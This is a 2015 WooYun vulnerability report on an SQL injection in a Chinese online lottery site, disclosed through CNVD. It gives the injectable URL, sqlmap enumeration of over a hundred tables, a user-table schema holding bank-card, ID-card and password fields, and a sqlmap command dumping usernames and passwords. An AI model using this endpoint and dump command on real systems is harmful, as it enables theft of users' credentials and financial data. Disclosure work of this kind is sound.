当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0131165

漏洞标题:卓彩网某处SQL注入泄露会员信息(百万级)

相关厂商:北京中民卓彩科技发展有限公司

漏洞作者: huoge

提交时间:2015-08-04 21:29

修复时间:2015-09-21 11:14

公开时间:2015-09-21 11:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-04: 细节已通知厂商并且等待厂商处理中
2015-08-07: 厂商已经确认,细节仅向厂商公开
2015-08-17: 细节向核心白帽子及相关领域专家公开
2015-08-27: 细节向普通白帽子公开
2015-09-06: 细节向实习白帽子公开
2015-09-21: 细节向公众公开

简要描述:

注入

详细说明:

卓彩网 - 在线购买采彡PIAO,福彩体彩足彩开奖查询
卓彩网(www.joycp.net)以服务中国采彡PIAO行业为己任,致力于为我国数亿采彡PIAO用户群体提供丰富多彩、种类全面、安全可靠的电话及手机购彩服务。
注入点:

http://www.joycp.com/Interface/CMS/GetCmsNanGe.ashx?lNa
me=2021&rowNuma=0&rowNumb=3


数据量不小:

Database: LOTTERYDB
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| TSP_LOG                        | 25261730 |
| B2B_LOG                        | 10266975 |
| USER_ACCOUNTDETAIL             | 5365455 |
| TICKET_TSP_SEQUENCE            | 2911384 |
| TICKET_ORDERTICKET             | 2873540 |
| TICKET_ORDERTICKETEXTEND       | 2779005 |
| USER_VISIT_LOG                 | 2436777 |
| TICKET_TOGETHERABORTION        | 2358759 |
| DEPOSIT_LOG                    | 1963851 |
| TICKET_ORDER                   | 1185729 |
| TICKET_ORDEREXTEND             | 1185724 |
| USER_ACCOUNT                   | 1154543 |
| USER_INFOEXTEND                | 1111853 |
| USER_INFO                      | 1111847 |
| AWARD_INFO                     | 1111244 |
| JOYCP_CARD                     | 1052010 |
| DEPOSIT_DETAIL                 | 1032650 |
| HERO_ERRORLOG                  | 626514  |
| USER_EXPERIENCEDETAIL          | 447701  |
| SCORE_VERSUS                   | 310778  |
| MONITOR_LOG                    | 121707  |
| TICKET_ACCOUNTDETAIL           | 98284   |
| HERO_SQLLOG                    | 97979   |
| B2B_ACCOUNTDETAIL              | 78126   |
| TOGETHER_USER                  | 77043   |
| USER_NOTICE                    | 70033   |
| USER_EVENTINFO                 | 65007   |
| AWARDISSUE_FOOTBALL            | 58118   |
| B2B_ORDERTICKET                | 37822   |
| B2B_ORDERTICKETEXTEND          | 37822   |
| MONITOR_SMS                    | 28505   |
| USER_AWARDINFO                 | 28102   |
| SCORE_MATCH                    | 23777   |
| TOGETHER_PROJECT               | 22177   |
| FOOTBALL_TEAM                  | 16028   |
| USER_DRAWMONEY                 | 13965   |
| CMS_ARTICLETYPE                | 11889   |
| CMS_ARTICLE                    | 11597   |
| TOGETHER_GAMESOCRE             | 7774    |
| TICKET_ACCOUNTDSHARE           | 6915    |
| HERO_TICKETORDERID             | 4747    |
| TOGETHER_SCOREANALYZE          | 3560    |
| PARTNERS_ACCOUNTDETAIL         | 2590    |
| USER_FOLLOWER                  | 2585    |
| TICKETORDERPACKAGE             | 2494    |
| USER_NOTICECONFIG              | 1970    |
| PARTNERS_INFO                  | 1523    |
| USER_PACKAGE                   | 1188    |
| AWARD_SALE_ADDRESS             | 1160    |
| USER_OPERATE_LOG               | 960     |
| HERO_MANUAL_WINDATA            | 445     |
| ADMIN_MENUPERMISSION           | 346     |
| DICT_GAMETYPE                  | 337     |
| DICT_TSP_CMDCODE               | 235     |
| HERO_TEMP_TICKETTSPID          | 171     |
| JOYCP_ACTIVITY                 | 109     |
| DICT_TSP_CMDCODE_DATABAK       | 102     |
| CMS_CATEGORY                   | 75      |
| USER_TOGETHEFOLLOWCONFIG       | 75      |
| ADMIN_MENU                     | 70      |
| USER_TOGETHEFOLLOWDETAIL       | 70      |
| USER_BROADBANDFOLLOW           | 60      |
| DICT_DEPOSIT_SUBCHANEL         | 59      |
| ADMIN_PERMISSION               | 55      |
| TSP_GAMECONFIG                 | 51      |
| USER_TOGETHEFOLLOWCOUNT        | 51      |
| GUARANTEEPROFIT                | 45      |
| FOOTBALL_LEAGUE                | 44      |
| DICT_USER_ACOUNTTYPE           | 38      |
| DICT_GAMENAME                  | 32      |
| AWARD_FOREIGNDATA_CONFIG       | 28      |
| HERO_TICKET_ORDERTICKETBAK     | 27      |
| HERO_TICKET_ORDERTICKETEXTENDK | 27      |
| AWARD_ISSUENOW                 | 26      |
| CMS_AUTHOR                     | 26      |
| DICT_DEPOSIT_CHANEL            | 26      |
| CMS_SOURCE                     | 21      |
| HERO_DINGTOU                   | 21      |
| TSP_INFO                       | 21      |
| PACKAGE_CONFIG                 | 20      |
| TSP_ACCOUNTDETAIL              | 20      |
| HERO_JOYCPCARDAGENT            | 19      |
| ADMIN_USERINFO                 | 17      |
| DICT_SCORESTATUS               | 10      |
| ADMIN_ROLE                     | 9       |
| B2B_GAMECONFIG                 | 9       |
| DICT_USEREXPERIENCE            | 8       |
| DICT_USERNOTICETYPE            | 8       |
| AWARD_FOREIGNDATA_GAMECONFIG   | 7       |
| B2B_INFO                       | 6       |
| DICT_B2B_ACCOUNTTYPE           | 6       |
| DICT_ORDERMODE                 | 6       |
| DICT_TICKET_STATUS             | 6       |
| DICT_ORDERTYPE                 | 5       |
| DICT_SMSTYPE                   | 4       |
| PACKAGETYPE                    | 4       |
| DICT_ORDERORIGIN               | 3       |
| DICT_ORDERSTATUS               | 3       |
| DICT_PARTNERS_ACCOUNTTYPE      | 3       |
| USER_BROADCASTDATAANNALS       | 3       |
| DICT_MSGTYPE                   | 2       |
| CMS_KEYWORDVALUE               | 1       |
| DICT_TSP_ACCOUNTTYPE           | 1       |
| DICT_USER_OPERATE_TYPE         | 1       |
| USER_BROADCASTDATA             | 1       |
+--------------------------------+---------+


USER_INFO表结构;
USER_INFO 1111847 //数据量

Database: LOTTERYDB
Table: USER_INFO
[21 columns]
+------------------+----------+
| Column           | Type     |
+------------------+----------+
| "\x08ARTNERID"   |
| BANKADDRESS      | VARCHAR2 |
| BANKCARD         | VARCHAR2 |
| BANKNAME         | VARCHAR2 |
| CHECK            |
| CHECKEMAIL       | NUMBER   |
| CONSUMMATE       | NUMBER   |
| CREATETIME       | DATE     |
| DRAWPWD          | VARCHAR2 |
| EMAIL            | VARCHAR2 |
| IDCARD           | VARCHAR2 |
| IDCARD_STATUS    | NUMBER   |
| IDCARDTYPE       | NUMBER   |
| MOBILE           | VARCHAR2 |
| PWD              | VARCHAR2 |
| REALNAME         | VARCHAR2 |
| SECURITYANSWER   | VARCHAR2 |
| SECURITYQUESTION | VARCHAR2 |
| STATUS           | NUMBER   |
| USERID           | NUMBER   |
| USERNAME         | VARCHAR2 |
+------------------+----------+


随便选了两列跑了几行数据:
-D LOTTERYDB -T USER_INFO -C "USERNAME,PWD" --start 1111800 --stop 1111847 --dump

QQ截图20150802221959.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 huoge@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-08-07 11:12

厂商回复:

CNVD确认所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。

最新状态:

暂无